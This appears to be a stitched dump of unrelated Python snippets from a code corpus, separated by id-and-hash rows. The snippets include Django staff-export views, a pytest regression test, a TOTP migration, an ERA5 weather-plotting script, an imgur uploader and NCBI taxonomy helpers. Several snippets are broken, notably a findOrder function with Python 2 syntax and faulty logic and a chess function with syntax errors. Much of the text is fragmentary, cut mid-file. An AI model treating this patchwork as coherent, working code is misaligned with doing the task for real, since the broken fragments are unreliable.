    def get_success_url(self):
        return reverse(
            'carga-horaria:profesor',
            kwargs={
                'pk': self.object.profesor.pk,
            }
        )
@login_required
def asignar_asistente(request, pk, tipo):
    """Create an AsignacionAsistente of the given ``tipo`` for an asistente."""
    pp = get_object_or_404(Asistente, pk=pk)
    tipo_display = dict(AsignacionAsistente.TIPO_CHOICES)[int(tipo)]
    if request.method == 'POST':
        form = AsignacionAsistenteForm(request.POST, asistente=pp, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
        if form.is_valid():
            asignacion = form.save(commit=False)
            asignacion.asistente = pp
            asignacion.tipo = tipo
            # if asignacion.horas == 0:
            #     asignacion.horas = pp.horas_no_lectivas_disponibles
            asignacion.save()
            return redirect('carga-horaria:asistente', pp.pk)
    else:
        form = AsignacionAsistenteForm(user=request.user, colegio=request.session.get('colegio__pk', None))
    return render(request, 'carga_horaria/asignar_asistente.html', {'asistente': pp,
                                                                    'form': form})
class AsignacionAsistenteDeleteView(LoginRequiredMixin, DeleteView):
    """Delete an AsignacionAsistente; GET deletes immediately (no confirmation)."""
    model = AsignacionAsistente
    template_name = 'carga_horaria/periodo/eliminar_periodo.html'

    def get(self, request, *args, **kwargs):
        return self.post(request, *args, **kwargs)

    def get_success_url(self):
        return reverse(
            'carga-horaria:asistente',
            kwargs={
                'pk': self.object.asistente.pk,
            }
        )
@login_required
def profesores_info(request):
    """Export every Profesor visible to the user as an XLSX attachment.

    Replaces 74 copy-pasted ``worksheet.write`` calls with a data-driven
    header list and row builder; the cells written are identical.
    """
    headers = [
        'RUT', 'Nombre Docente', 'Dirección Docente', 'Comuna', 'Nacionalidad',
        'Teléfono', 'Email personal', 'Email institucional', 'Estado civil',
        'Discapacidad', 'Recibe pensión', 'Adventista', 'Fecha de Nacimiento',
        'Tipo de Contrato', 'Cargo', 'Fecha de Inicio Contrato',
        'Horas Contrato Propuestas', 'Horas SBVG', 'Horas SEP', 'Horas PIE',
        'Horas Indefinidas Actual', 'Horas Plazo Fijo Actual',
        'Horas Jornada Semanal', 'Asignaciones Aula Plan', 'Horas Aula PIE',
        'Horas Aula SEP', 'Horas Aula Sostenedor', 'Horas disponibles',
        'Asignación No Lectiva', 'Horas no lectivas disponibles',
        'Asignación No Aula Normal', 'Asignación No Aula PIE',
        'Asignación No Aula SEP', 'Especialidad', 'Profesor Jefe',
        'Fundación que lo contrata', 'Colegio',
    ]

    def _row(pp):
        # One list entry per header, in the same order.
        return [
            pp.rut,
            pp.nombre,
            pp.direccion,
            pp.persona.comuna,
            pp.persona.nacionalidad,
            pp.persona.telefono,
            pp.persona.email_personal,
            pp.persona.email_institucional,
            pp.persona.get_estado_civil_display(),
            'Sí' if pp.persona.discapacidad else 'No',
            'Sí' if pp.persona.recibe_pension else 'No',
            'Sí' if pp.persona.adventista else 'No',
            pp.persona.fecha_nacimiento,
            pp.get_tipo_display(),
            pp.get_cargo_display(),
            pp.fecha_inicio,
            pp.horas_semanales_total,
            pp.horas_sbvg_total,
            pp.total_sep,
            pp.total_pie,
            pp.horas_indefinidas,
            pp.horas_plazo_fijo,
            pp.horas_semanales,
            pp.horas_asignadas_plan,
            pp.horas_asignadas_pie,
            pp.horas_asignadas_sep,
            pp.horas_asignadas_sostenedor,
            pp.horas_disponibles,
            pp.horas_no_lectivas_asignadas_anexo,
            pp.horas_no_lectivas_disponibles,
            pp.horas_no_aula_asignadas_ordinaria,
            pp.horas_no_aula_asignadas_pie,
            pp.horas_no_aula_asignadas_sep,
            str(pp.especialidad),
            pp.jefatura if pp.es_profesor_jefe else 'No',
            str(pp.fundacion),
            str(pp.colegio),
        ]

    output = io.BytesIO()
    workbook = xlsxwriter.Workbook(output)
    worksheet = workbook.add_worksheet('Profesores')
    qs = get_for_user(request, Profesor.objects.all(), 'colegio__pk', request.user)
    for col, header in enumerate(headers):
        worksheet.write(0, col, header)
    for row, pp in enumerate(qs, start=1):
        for col, value in enumerate(_row(pp)):
            worksheet.write(row, col, value)
    workbook.close()
    output.seek(0)
    filename = 'profesores-info.xlsx'
    response = HttpResponse(
        output,
        content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
    )
    response['Content-Disposition'] = 'attachment; filename=%s' % filename
    return response
@login_required
def asistentes_info(request):
    """Export every Asistente visible to the user as an XLSX attachment.

    Replaces the copy-pasted ``worksheet.write`` calls with a data-driven
    header list and row builder; the cells written are identical.
    """
    headers = [
        'RUT', 'Nombre Asistente', 'Fecha de Nacimiento', 'Nacionalidad',
        'Dirección', 'Comuna', 'Teléfono', 'Email personal',
        'Email institucional', 'Estado civil', 'Adventista', 'Discapacidad',
        'Recibe pensión', 'Fecha de Inicio Contrato', 'Horas Contrato',
        'Función', 'SEP', 'PIE', 'Sostenedor', 'Fundación que lo contrata',
        'Colegio',
    ]

    def _row(pp):
        # One list entry per header, in the same order.
        return [
            pp.rut,
            pp.nombre,
            pp.persona.fecha_nacimiento,
            pp.persona.nacionalidad,
            pp.persona.direccion,
            pp.persona.comuna,
            pp.persona.telefono,
            pp.persona.email_personal,
            pp.persona.email_institucional,
            pp.persona.get_estado_civil_display(),
            'Sí' if pp.persona.adventista else 'No',
            'Sí' if pp.persona.discapacidad else 'No',
            'Sí' if pp.persona.recibe_pension else 'No',
            pp.fecha_inicio,
            pp.horas,
            pp.funcion,
            pp.horas_sep,
            pp.horas_pie,
            pp.horas_sostenedor,
            str(pp.fundacion),
            str(pp.colegio),
        ]

    output = io.BytesIO()
    workbook = xlsxwriter.Workbook(output)
    worksheet = workbook.add_worksheet('Asistentes')
    qs = get_for_user(request, Asistente.objects.all(), 'colegio__pk', request.user)
    for col, header in enumerate(headers):
        worksheet.write(0, col, header)
    for row, pp in enumerate(qs, start=1):
        for col, value in enumerate(_row(pp)):
            worksheet.write(row, col, value)
    workbook.close()
    output.seek(0)
    filename = 'asistentes-info.xlsx'
    response = HttpResponse(
        output,
        content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
    )
    response['Content-Disposition'] = 'attachment; filename=%s' % filename
    return response
|
4,844 | c9279434736d4e94564170fe98163ad3be9470b1 | """ Tests for challenge116 """
import pytest
from robber import expect
from pemjh.challenge116 import main
# Parametrized regression test: the small case is the published example,
# the large case pins the known answer against regressions.
# NOTE: the parameter name ``input`` shadows the builtin; kept because the
# parametrize id string must match the argument name.
@pytest.mark.parametrize('input, expected',
                         [
                             pytest.param(5, 12, marks=pytest.mark.example),
                             pytest.param(50, 20492570929,
                                          marks=pytest.mark.regression)
                         ])
def test_challenge116(input, expected):
    """ Regression testing challenge116 """
    expect(main(input)).to.eq(expected)
|
4,845 | 2fb299f5454c251dc1c77c2597ee23bf414c716e | learningRateBase = 0.001
learningRateDecreaseStep = 80  # decay the learning rate every N steps
epochNum = 100                 # total training epochs
generateNum = 3                # number of poems to generate at inference time
batchSize = 16                 # training batch size
trainPoems = "./data/poems.txt"  # path to the training corpus
checkpointsPath = "./model/"     # directory for saved model checkpoints
4,846 | 8c51b2c06f971c92e30d6b2d668fdd2fd75142d2 | class Reader:
    @staticmethod
    def read_file(file_path):
        """Read the file at ``file_path`` and return its contents.

        Stub implementation: currently ignores the path and always
        returns the empty string.
        """
        return ''
4,847 | 4a913cfdbddb2f6b5098395814f5fc1203192b9a |
def f(p_arg, *s_args, **kw_args):
    """Return p_arg + the first extra positional arg + the 'py' keyword arg."""
    partial = s_args[0] + kw_args['py']
    return partial + p_arg
r = f(3, 2, py = 1) ## value r => 6
|
4,848 | 75b13f4985fcf26fb9f7fb040554b52b13c1806d | def findOrder(numCourses,prerequisites):
d={}
for i in prerequisites:
if i[0] not in d:
d[i[0]]=[i[1]]
if i[1] not in d:
d[i[1]]=[]
else:
d[i[0]].append(i[1])
res=[]
while d:
for i in range(numCourses):
if d[i] == []:
res.append(d[i])
tmp=d[i]
del d[i]
for j in d:
if tmp in d[j]:
del d[j][tmp]
print res
# Demo: 4 courses; courses 1 and 2 require 0, and 3 requires both 1 and 2.
p = [[1,0],[2,0],[3,1],[3,2]]
n = 4
findOrder(n, p)
|
4,849 | aa00e4569aeae58e3f0ea1a8326e35c0776f7727 | """Defines all Rady URL."""
from django.conf.urls import url, include
from django.contrib import admin
# Versioned API routes, mounted under /api/v1/ below.
apiv1_urls = [
    url(r"^users/", include("user.urls")),
    url(r"^meetings/", include("meeting.urls")),
    url(r"^docs/", include("rest_framework_docs.urls")),
    url(r"^auth/", include("auth.urls")),
    url(r"^fcm/devices/", include("device.urls")),
    url(r"^statistics/", include("stats.urls")),
    url(r"^admin/", include("admin.urls")),
]
# Top-level routes: the API plus the Django admin site.
urlpatterns = [
    url(r"^api/v1/", include(apiv1_urls)),
    url(r"^admin/", admin.site.urls),
]
|
4,850 | be566041402dc1705aa9d644edc44de8792fbb3c | from extras.plugins import PluginTemplateExtension
from .models import BGPSession
from .tables import BGPSessionTable
class DeviceBGPSession(PluginTemplateExtension):
    """Inject a table of this device's BGP sessions into the device page.

    The plugin setting ``device_ext_page`` selects which page region
    ('left', 'right' or 'full_width') receives the table; the other
    regions render nothing.
    """
    model = 'dcim.device'

    def _placement(self):
        # Region configured for this extension, or None when unset.
        return self.context['config'].get('device_ext_page')

    def left_page(self):
        return self.x_page() if self._placement() == 'left' else ''

    def right_page(self):
        return self.x_page() if self._placement() == 'right' else ''

    def full_width_page(self):
        return self.x_page() if self._placement() == 'full_width' else ''

    def x_page(self):
        device = self.context['object']
        sessions = BGPSession.objects.filter(device=device)
        return self.render(
            'netbox_bgp/device_extend.html',
            extra_context={
                'related_session_table': BGPSessionTable(sessions)
            }
        )
template_extensions = [DeviceBGPSession]
|
4,851 | 7d0d1a53a249167edade24a4e9305c95288a8574 | def chess():
row = 0
line = 0
chess1 = []
chess2 = []
for line in range(3):
x1 = (0,line)
chess1.append(x1)
for line in range(3):
x2 = (1,line)
chess2.append(x2)
print(chess1)
print(chess2)
for x in range(len(chess1))
if chess2[x][1] != chess1[]
chess()
|
4,852 | 2e448176a755828e5c7c90e4224102a285098460 | from django.conf import settings
from django.db import migrations, models
import django_otp.plugins.otp_totp.models
class Migration(migrations.Migration):
    """Initial migration for django-otp's TOTP plugin: creates TOTPDevice.

    Auto-generated schema definition; the field list must stay in sync with
    ``django_otp.plugins.otp_totp.models.TOTPDevice``.
    """
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='TOTPDevice',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(help_text='The human-readable name of this device.', max_length=64)),
                ('confirmed', models.BooleanField(default=True, help_text='Is this device ready for use?')),
                ('key', models.CharField(default=django_otp.plugins.otp_totp.models.default_key, help_text='A hex-encoded secret key of up to 40 bytes.', max_length=80, validators=[django_otp.plugins.otp_totp.models.key_validator])),
                ('step', models.PositiveSmallIntegerField(default=30, help_text='The time step in seconds.')),
                ('t0', models.BigIntegerField(default=0, help_text='The Unix time at which to begin counting steps.')),
                ('digits', models.PositiveSmallIntegerField(default=6, help_text='The number of digits to expect in a token.', choices=[(6, 6), (8, 8)])),
                ('tolerance', models.PositiveSmallIntegerField(default=1, help_text='The number of time steps in the past or future to allow.')),
                ('drift', models.SmallIntegerField(default=0, help_text='The number of time steps the prover is known to deviate from our clock.')),
                ('last_t', models.BigIntegerField(default=-1, help_text='The t value of the latest verified token. The next token must be at a higher time step.')),
                ('user', models.ForeignKey(help_text='The user that this device belongs to.', to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE)),
            ],
            options={
                'abstract': False,
                'verbose_name': 'TOTP device',
            },
            bases=(models.Model,),
        ),
    ]
|
4,853 | 09a468e11651eb60e0805c151bda270e0ebecca9 | #!/usr/bin/env python
'''
fix a time and then draw the instant geopotential (contour) from
/gws/nopw/j04/ncas_generic/users/renql/ERA5_subdaily/ERA5_NH_z_1989.nc,
spatial filtered relative vorticity (shaded) from
~/ERA5-1HR-lev/ERA5_VOR850_1hr_1995_DET/ERA5_VOR850_1hr_1995_DET_T63filt.nc
and identified feature points from
~/ERA5-1HR-lev/ERA5_VOR850_1hr_1995_DET/fft_trs_pos
Loop through the height (850, 500, 250)
20211116
'''
import sys
import subprocess
import xarray as xr
import numpy as np
import pandas as pd
from datetime import datetime
import gc #garbage collector
import matplotlib
import matplotlib.pyplot as plt
from matplotlib import colors
import cartopy.crs as ccrs
import cartopy.feature as cfeat
from cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter
import cmaps
from PIL import Image, ImageDraw, ImageSequence
def calc_frames(new_time):
old_time = datetime(new_time.year-1, 11, 30, 23)
days = (new_time - old_time).days
sec = (new_time - old_time).seconds
hours = days * 24 + sec/3600
return int(hours)
def read_point_fixtime(filname, fixtime, flonl, flonr, flats, flatn):
    """Collect feature points from a TRACK-format file at one time step.

    Skips the four header lines, then for each ``TRACK_ID`` record reads the
    point count from the following line and scans that many data lines of
    ``time lon lat ...``.  Points whose integer timestamp equals ``fixtime``
    (a string like ``YYYYMMDDHH``) and whose lon/lat fall inside the
    [flonl, flonr] x [flats, flatn] box are kept.

    Returns ``(lats, lons)`` as two parallel lists of floats; also prints a
    summary count.
    """
    lat_hits = []
    lon_hits = []
    with open(filname, "r") as src:
        # Discard the four header lines.
        for _ in range(4):
            src.readline()
        line = src.readline()
        while line:
            if line.strip().split(" ")[0] == "TRACK_ID":
                npoints = int(src.readline().strip().split(" ")[-1])
                for _ in range(npoints):
                    fields = list(map(float, src.readline().strip().split(" ")))
                    in_box = (flonl <= fields[1] <= flonr) and (flats <= fields[2] <= flatn)
                    if str(int(fields[0])) == fixtime and in_box:
                        lat_hits.append(fields[2])
                        lon_hits.append(fields[1])
            line = src.readline()
    print("%s total feature point in %s : %d"%(filname,fixtime,len(lat_hits)))
    return lat_hits, lon_hits
# --- plotting domain (degrees) ---
lonl=0    # western edge of the map
lonr=150  # eastern edge (alternative: 360 for global)
lats=15   # southern edge
latn=70   # northern edge (alternative: 90)
lat_sp = 20  # latitude tick spacing
lon_sp = 30  # longitude tick spacing
nrow = 3  # one panel per pressure level
ncol = 1
bmlo = 0.1  # bottom margin fraction for tight_layout
title_font=18
label_font=14
# 6-hourly timestamps to plot, starting 1995-01-01 00 UTC.
dtime = pd.date_range(start='1995-01-01 00',periods=60, freq='6H',closed=None)
#dtime = pd.date_range(start='1995-01-01 00',end='1995-01-15 00', freq='6H',closed=None)
create_gif = True  # assemble the per-time PNGs into a GIF afterwards
nfilt="T63"  # spectral filter label used in the vorticity filenames
lev = [850,500,250]  # pressure levels (hPa), one map row each
cnlvl =[[-8 ,1 ]]    # [start, step] for the shaded vorticity contour levels
cnlvl2 = [30,50,100] # geopotential contour interval (m) per level
varname = 'z'
path = '/home/users/qd201969/ERA5-1HR-lev/'
datapath = "/gws/nopw/j04/ncas_generic/users/renql/"  # e.g. <datapath>t/ERA5_NH_t_1989.nc
figdir = "/home/users/qd201969/uor_track/fig/"
# Geopotential dataset for the first plotted year; converted to metres below.
f = xr.open_dataset("%sERA5_subdaily/%s/ERA5_NH_%s_%d.nc"%(datapath,varname,varname,dtime[0].year))
lat = f['latitude'].data
lon = f['longitude'].data
ilon = lon[(lon>=lonl) & (lon<=lonr)]
ilat = lat[(lat>=lats) & (lat<=latn)]
# Surface geopotential (topography) used to outline 1500 m and 3000 m terrain.
ds = xr.open_dataset("/home/users/qd201969/gtopo30_0.9x1.25.nc")
phis = ds['PHIS'].sel(lon=ilon,lat=ilat,method="nearest").load()
phis = phis/9.8 # transfer from m2/s2 to m
del ds
gc.collect()
nl = 0
fcolors = cmaps.BlueDarkRed18
cnlevels = np.arange(cnlvl[nl][0], cnlvl[nl][0]+cnlvl[nl][1]*(fcolors.N-1), cnlvl[nl][1])
norm = colors.BoundaryNorm(boundaries=cnlevels, ncolors=fcolors.N,extend='both')
params = {'legend.fontsize': label_font,
          'axes.labelsize': label_font,
          'axes.titlesize':label_font,
          'xtick.labelsize':label_font,
          'ytick.labelsize':label_font}
plt.rcParams.update(params)
# Main loop: one figure per timestamp, one panel per pressure level.
for nt in range(len(dtime)):
    fig = plt.figure(figsize=(12,12),dpi=100)
    ax = fig.subplots(nrow,ncol, subplot_kw=dict(projection=ccrs.PlateCarree())) #sharex=True, sharey=True
    for nl in range(len(lev)):
        # Geopotential height (m) for this time/level.
        var = f[varname].sel(time=dtime[nt],level=lev[nl],longitude=ilon,latitude=ilat)
        var.data = var.data/9.8
        path2 = "%sERA5_VOR%d_1hr_%d_DET/"%(path,lev[nl],dtime[nt].year)
        # Identified feature points inside the plotting box at this timestamp.
        plat, plon = read_point_fixtime(path2+"fft_trs_pos",dtime[nt].strftime('%Y%m%d%H'),lonl,lonr,lats,latn)
        # Spectrally filtered relative vorticity; time is a frame index (hours
        # since 23:00 on 30 Nov of the previous year), hence calc_frames.
        fvor = xr.open_dataset("%sERA5_VOR%d_1hr_%d_DET_%sfilt.nc"%(path2,lev[nl],dtime[nt].year,nfilt))
        var1 = fvor['var'].sel(time=calc_frames(dtime[nt]),level = 1,lon=ilon,lat=ilat,method="nearest").load()
        #fvor = xr.open_dataset("%sERA5_VOR_1h_dec_jan/ERA5_VOR%d_1hr_dec-jan%d_DET.nc"%(datapath,lev[nl],dtime[nt].year))
        #var1 = fvor['var138'].sel(time=dtime[nt],lev=float(lev[nl]*100),lat=ilat,lon=ilon,method="nearest").load()
        var1.values = var1.values*1e5  # scale vorticity to 1e-5 s-1 for plotting
        axe = ax[nl]
        axe.add_feature(cfeat.COASTLINE.with_scale('110m'),edgecolor='black', linewidth=0.8, zorder=1)
        axe.set_title("%s %dhPa (%d)"%(dtime[nt].strftime('%Y-%m-%d-%H:00'), lev[nl], len(plat)),fontsize=title_font)
        # Shaded: filtered vorticity; contours: geopotential height; dots: feature points.
        shad = axe.contourf(ilon, ilat, var1, cnlevels,
                 transform=ccrs.PlateCarree(),cmap=fcolors,extend='both',norm=norm)
        cont = axe.contour(ilon, ilat, var, np.arange(1000,15000,cnlvl2[nl]),
                 transform=ccrs.PlateCarree(), colors='gray', linewidths=1.5)
        #pint = axe.plot(plon,plat,color='darkviolet', marker='o', markersize=12, transform=ccrs.PlateCarree())
        pint = axe.scatter(plon,plat,10.0**2,color='k', marker='o', transform=ccrs.PlateCarree())
        # Terrain outlines at 1500 m and 3000 m.
        topo = axe.contour(ilon, ilat, phis, [1500,3000],
                 transform=ccrs.PlateCarree(),colors='black',linewidths=1.2)
        axe.set_yticks(np.arange(lats,latn,lat_sp), crs=ccrs.PlateCarree())
        axe.yaxis.set_major_formatter(LatitudeFormatter(degree_symbol=''))
        axe.set_xticks(np.arange(lonl,lonr,lon_sp), crs=ccrs.PlateCarree())
        axe.xaxis.set_major_formatter(LongitudeFormatter(degree_symbol=''))
    # Shared vertical colourbar for the vorticity shading.
    position = fig.add_axes([0.85, bmlo+0.1, 0.015, 0.7]) #left, bottom, width, height
    cb = plt.colorbar(shad, cax=position ,orientation='vertical')#, shrink=.9)
    cb.set_label(label='T5~63 Relative Vort (1e5)', size=label_font) #, weight='bold'
    plt.tight_layout(rect=(0,bmlo,1,1))
    plt.savefig(figdir+"filt_vor_%s.png"%(dtime[nt].strftime('%Y%m%d%H')), bbox_inches='tight',pad_inches=0.01)
# Optionally stitch the per-time PNGs into an animated GIF, then delete them.
if create_gif == True:
    figname = figdir+"filt_vor_*.png"
    fn_stream = subprocess.check_output("ls "+figname, shell=True).decode('utf-8')
    fn_list = fn_stream.split()
    print(fn_list[0])
    print('filenumber : '+str(len(fn_list)))
    gif_name = figname.rsplit("_",1)[0]+".gif"
    frames = []
    for itm in fn_list:
        frame = Image.open(itm)
        frames.append(frame)
    frames[0].save(gif_name, save_all=True, append_images=frames[1:],\
                   duration = 1000, loop=0, disposal=1)
    subprocess.run('rm -f %s'%(figname),shell=True)
4,854 | 9109e649a90730df022df898a7760140275ad724 | # -*- coding:utf-8 -*-
#实现同义词词林的规格化
with open('C:\\Users\\lenovo\\Desktop\\哈工大社会计算与信息检索研究中心同义词词林扩展版.txt') as f:
with open('convert.txt','a') as w:
for line in f:
data = line[8:-1].split()
for item in data:
tmp = data.copy()
tmp.remove(item)
tmp.insert(0,item)
w.writelines('\t'.join(tmp)+'\n') |
4,855 | 05edbf3662936465eee8eee0824d1a0cca0df0e5 | # -*- coding: utf-8 -*-
# !/usr/bin/env python3
import pathlib
from PIL import Image
if __name__ == '__main__':
    # Resolve ../images/tiger.jpg relative to the current working directory.
    img_path = (pathlib.Path('..') / 'images' / 'tiger.jpg').resolve()
    # image load (context manager closes the file handle when done)
    with Image.open(str(img_path)) as img:
        # image info: format, dimensions and colour bands
        print('IMAGE: {}'.format(str(img_path)))
        print('Image is in {} format'.format(img.format))
        print('Image size: width {} pixels, height {} pixels'.format(img.size[0], img.size[1]))
        print('Image color bands: {}'.format(img.mode))
        # image display (opens the platform's default image viewer)
        img.show()
4,856 | dd23cd068eea570fc187dad2d49b30376fbd4854 | from django.urls import path
from django.conf.urls import include, url
from . import views
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# BUG FIX: Django reads ``app_name`` (with underscore) to register the URL
# namespace; the previous ``appname`` was a typo that did nothing.
app_name = 'home'
urlpatterns = [
    path('', views.home, name='home'),
]
# Serve collected static files in development.
urlpatterns += staticfiles_urlpatterns()
4,857 | d414e4497bae23e4273526c0bbdecd23ed665cac | # Copyright 2018 The Cornac Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module containing functions for negative item sampling.
"""
import numpy as np
def sample_items(num_items, shape, random_state=None):
    """Draw random item ids uniformly from ``[0, num_items)``.

    Parameters
    ----------
    num_items: int
        Total number of items; sampled ids are strictly smaller than this.
    shape: int or tuple of ints
        Shape of the returned array.
    random_state: np.random.RandomState instance, optional
        Source of randomness; a fresh RandomState is created when omitted.

    Returns
    -------
    items: np.array of shape [shape]
        Sampled item ids (dtype int64).
    """
    rng = np.random.RandomState() if random_state is None else random_state
    return rng.randint(0, num_items, shape, dtype=np.int64)
|
4,858 | 750565af03d945fbdc32e26347b28977b203e9dc | # Give a string that represents a polynomial (Ex: "3x ^ 3 + 5x ^ 2 - 2x - 5") and
# a number (whole or float). Evaluate the polynomial for the given value.
#Horner method
def horner(poly, x):
    """Evaluate a polynomial at ``x`` using Horner's rule.

    ``poly`` lists coefficients from the highest power down to the
    constant term, e.g. ``[3, 5, -2, -5]`` is 3x^3 + 5x^2 - 2x - 5.
    """
    acc = poly[0]
    # Fold in each remaining coefficient: acc*x + c per step.
    for coeff in poly[1:]:
        acc = acc * x + coeff
    return acc
# Demo: evaluate 3x^3 + 5x^2 - 2x - 5 at x = 3 (expected value: 115).
poly = [3 , 5 , -2 , -5 ]
x = 3
print("Value of polynomial is " , horner(poly, x))
4,859 | 705755340eef72470fc982ebd0004456469d23e4 | #!/usr/bin/env python
from postimg import postimg
import argparse
import pyperclip
import json
def main(args):
    """Upload ``args.img_path`` to imgur, wrap the returned link in the
    requested format (GitHub/Reddit markdown or HTML), copy it to the
    clipboard and print it.

    Returns None without copying anything when the upload fails.
    """
    if not args.quiet:
        print("Uploading.....")
    resp = postimg.Imgur(args.img_path).upload()
    if not resp['success']:
        if not args.quiet:
            print(json.dumps(resp, sort_keys=True, indent=4, separators=(',', ': ')))
        print("Unable to upload !!!")
        return None
    link = resp['data']['link']
    if args.github:
        # BUG FIX: this was ``link = '' % link``, which raises TypeError
        # ("not all arguments converted") because the format placeholder was
        # missing; emit GitHub markdown for an inline image instead.
        link = '![snap](%s)' % link
    elif args.reddit:
        link = '[Reddit](%s)' % link
    elif args.html:
        link = '<img src="%s" alt="snap">' % link
    pyperclip.copy(link)
    print(link)
if __name__ == '__main__':
    # Command-line interface: one positional image path plus mutually
    # independent output-format flags (first matching flag wins in main()).
    parser = argparse.ArgumentParser(description='Post/upload image on imgur.com', epilog='link will automatically copied to clipboard')
    parser.add_argument('img_path', type=str, help='image path of file')
    parser.add_argument('--github', action='store_true', help='Github markdown code of imgur url')
    parser.add_argument('--html', action='store_true', help='html <img> code of imgur url')
    parser.add_argument('--reddit', action='store_true', help='reddit markdown code of imgur url')
    parser.add_argument('-q','--quiet', action='store_true', help='print only img url without verbose output')
    args = parser.parse_args()
    try:
        main(args)
    except KeyboardInterrupt:
        print("Error: Interrupted by user!!")
4,860 | 5c1324207e24f2d723be33175101102bd97fe7a2 | # #!/usr/bin/python
# last edit abigailc@Actaeon on jan 27 2017
#pulling the taxonomy functions out of makespeciestree because I need to make them faster...
#insects is running for literally >20 hours.
names_file = "/Users/abigailc/Documents/Taxonomy_Stuff/taxdump/names.dmp"
nodes_file = "/Users/abigailc/Documents/Taxonomy_Stuff/taxdump/nodes.dmp"
######### PERSONAL_SETTINGS #########
ssh_inst = "ssh -l abigailc -i ~/.ssh/id_rsa eofe4.mit.edu"
clus_head = "abigailc@eofe4.mit.edu:/home/abigailc/"
Path_Blast = "/Users/abigailc/blast/"
import os
import re
import time
import sys
#from oxy_mods.Classes_DTL_Detector import Fasta
#BASIC OPERATIONS
def Str_To_Taxid(string, names_file):
    """Look up the NCBI taxon id for a taxon name in a names.dmp file.

    Underscores in ``string`` are treated as spaces.  Returns the leading
    digits of the first matching line (as a string, which may carry the
    line's trailing newline — callers strip it), or "NA" with an error
    message when the name is not found.

    NOTE(review): the name is interpolated into a regex unescaped, so names
    containing regex metacharacters may misbehave (pre-existing behaviour).
    """
    query = string.replace("_", " ")
    needle = "\t" + query + "\t"
    with open(names_file) as names:
        for line in names:
            if needle in line:
                # Strip everything after the leading taxid field.
                return re.sub(r"(\d*)(\t\|\t)(" + query + r")(\t)(.*)", r"\1", line)
    print("Error finding string: " + query + " in file: " + names_file)
    return "NA"
def Taxid_To_Children(taxid, nodes_file):
    """Return the direct children of ``taxid`` from a nodes.dmp file.

    Scans every line whose parent field equals ``taxid`` and returns a list
    of ``(child_taxid, child_rank)`` string tuples, both stripped.  Lines
    where the substitution fails (i.e. the taxid matched somewhere other
    than the parent field) are skipped.
    """
    pairs = []
    needle = "\t" + taxid + "\t"
    pattern = r"(\d*)(\t\|\t)(" + taxid + r")(\t\|\t)([a-z]*)(.*)"
    with open(nodes_file) as nodes:
        for line in nodes:
            if needle not in line:
                continue
            merged = re.sub(pattern, r"\1~\5", line)
            if "\t" in merged:
                # Substitution did not apply cleanly — not a real child line.
                continue
            child, rank = merged.split("~")
            pairs.append((child.strip(), rank.strip()))
    return pairs
def Get_Taxid_Rank(taxid, nodes_file):
    """Return the rank ('species', 'genus', ...) recorded for ``taxid``.

    Scans ``nodes_file`` (NCBI nodes.dmp format: lines beginning
    ``<taxid>\\t|\\t<parent>\\t|\\t<rank>\\t|...``) for the line whose first
    field is ``taxid`` and extracts the rank.  Returns "NA" when the taxid
    is not present.

    Fix: removed the unused ``ranklist`` accumulator from the original.
    """
    prefix = taxid.strip() + "\t"
    with open(nodes_file) as nodes:
        for line in nodes:
            # Exact-prefix match so taxid 12 cannot match 123, 12345, ...
            if line.startswith(prefix):
                rank = re.sub(r"(" + taxid.strip() + r")(\t\|\t)(\d*)(\t\|\t)([a-z]*)(.*)",
                              r"\5", line).strip()
                if "\t" not in rank:
                    return rank
    return "NA"
#returns the rank (eg, "order" of a taxid")
def One_Rank_Lower(rank):
    """Return the taxonomic rank one step below ``rank``.

    E.g. 'phylum' -> 'class', 'genus' -> 'species'.  Returns "NA" for
    'species' (nothing below it), for the literal "NA", and for any rank
    not in the standard ladder.  Prints progress/diagnostic messages,
    matching the original behaviour.
    """
    print("looking one level lower than" + rank)
    if rank == "species":
        print("is species!")
        return "NA"
    ladder = "superkingdom kingdom phylum class order family genus species".split()
    if rank not in ladder:
        if rank != "NA":
            print(rank + " is weird")
        return "NA"
    return ladder[ladder.index(rank) + 1]
#given phylum, returns class. given class, return order. etc.
# rank = "class"
# string = "cyanobacteria"
# taxid = "12345"
def Return_Parent(taxid, nodes_file):
    """Return the parent taxid of ``taxid`` from a nodes.dmp file.

    The returned string is the raw parent field from the matching line
    (it may carry the line's trailing newline — callers strip it).
    Prints an error and returns "NA" when no line starts with the taxid.
    """
    tid = taxid.strip()
    prefix = tid + "\t"
    with open(nodes_file) as nodes:
        for line in nodes:
            # Exact-prefix match so taxid 12 cannot match 123, 12345, ...
            if line[:len(prefix)] == prefix:
                parent = re.sub(r"(" + tid + r")(\t\|\t)(\d*)(\t\|\t)([a-z]*)(.*)",
                                r"\3", line)
                if "\t" not in parent:
                    return parent
    print("error finding parent taxa")
    return("NA")
#COMPLEX OPERATIONS
def Ret_A_Valid_Species_Below_LESS_EFFICIENTLY(taxid, nodes_file, names_file, acc_list):
    """Search descendants of ``taxid`` one top-level child branch at a time
    and return the first species-level name that is capitalised and accepted
    by Check_Spec_Name_Acceptable_List; returns "NA" when no branch yields one.

    NOTE(review): relies on sibling helpers defined elsewhere in this file
